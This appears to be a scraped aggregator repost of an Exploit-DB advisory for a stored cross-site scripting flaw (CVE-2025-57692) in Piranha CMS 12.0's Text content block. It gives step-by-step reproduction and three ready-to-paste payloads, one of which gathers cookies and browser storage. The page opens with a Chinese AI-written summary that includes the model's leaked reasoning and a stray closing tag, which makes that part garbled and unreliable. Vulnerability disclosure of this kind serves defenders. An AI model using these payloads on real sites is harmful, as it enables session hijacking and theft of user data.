[webapps] Piranha CMS 12.0 - Stored XSS in Text Block
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。用户提供的文章是关于Piranha CMS 12.0的一个存储型XSS漏洞的详细说明。 首先,我得通读整篇文章,抓住关键点。文章提到了漏洞的标题、日期、作者、版本等信息。然后是漏洞的复现步骤,包括登录管理面板、添加页面、插入恶意脚本等。最后提到了几个payload的例子。 接下来,我需要将这些信息浓缩成一句话。重点在于说明漏洞的类型、影响范围以及触发方式。存储型XSS意味着攻击者可以在页面中注入脚本,这些脚本会在其他用户访问时执行。 考虑到用户要求直接写描述,不需要开头语,所以我要确保内容简洁明了,涵盖漏洞的位置(Text内容块)、触发条件(管理员权限)以及潜在影响(窃取敏感信息)。 最后,检查字数是否在100字以内,并确保语言流畅自然。 </think> Piranha CMS 12.0 存在存储型 XSS 漏洞,攻击者可通过 Text 内容块注入恶意脚本,在其他用户访问页面时执行任意 JavaScript 代码。该漏洞需管理员权限触发,可窃取 cookies、localStorage 等敏感信息。 2026-2-2 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:2 收藏

# Exploit Title: Piranha CMS 12.0 - Stored Cross Site Scripting 
# Date: 2025-09-26
# Exploit Author: Chidubem Chukwu (Terminal Venom)
# LinkedIn : https://www.linkedin.com/in/chidubem-chukwu-20bb202a9?
# Vendor Homepage: https://piranhacms.org
# Software Link: https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0
# Version: 12.0
# Category: Web Application
# Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome 
# CVE: CVE-2025-57692
# Privilege Level: authenticated user
# Patched Version: Not available
# Exploit link: https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md




## Reproduction Steps ##

PiranhaCMS 12.0 allows stored XSS in the Text content block of Standard and Standard Archive Pages via /manager/pages, enabling execution of arbitrary JavaScript in another user s browser.

Reproduction steps 

	1.	Log in to the Piranha admin panel at https://<host>/manager/login.

	2.	Navigate to Pages.

	3.	Click Add Page and choose Standard Page or Standard Archive.

	4.	Enter a page title (e.g., XSS-Test).

	5.	Click the [ + ] button and select Text under Content to add a Text block.

	6.	In the Text block input area, paste one of the payloads below (paste directly into the editor and save). The payload will execute immediately when pasted/saved and will also execute for anyone who later accesses or previews the page.

Payload A 

<img src="x" onerror="
  alert(
    'Cookies: ' + document.cookie + '\n' +
    'LocalStorage: ' + JSON.stringify(localStorage) + '\n' +
    'SessionStorage: ' + JSON.stringify(sessionStorage) + '\n' +
    'URL: ' + window.location.href + '\n' +
    'User Agent: ' + navigator.userAgent + '\n' +
    'Time: ' + new Date().toLocaleString()
  )
" />

Payload B — iframe base64 

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>

Payload C — details toggle (on-toggle alert)

<details open ontoggle=alert('XSS')>Click</details>

	7.	Click Save. The payload executes immediately upon save (and will execute again when the page is previewed or accessed by others).

	8.	Anyone who accesses the page (or pastes the payload) will trigger the XSS.
            

文章来源: https://www.exploit-db.com/exploits/52471
如有侵权请联系:admin#unsafe.sh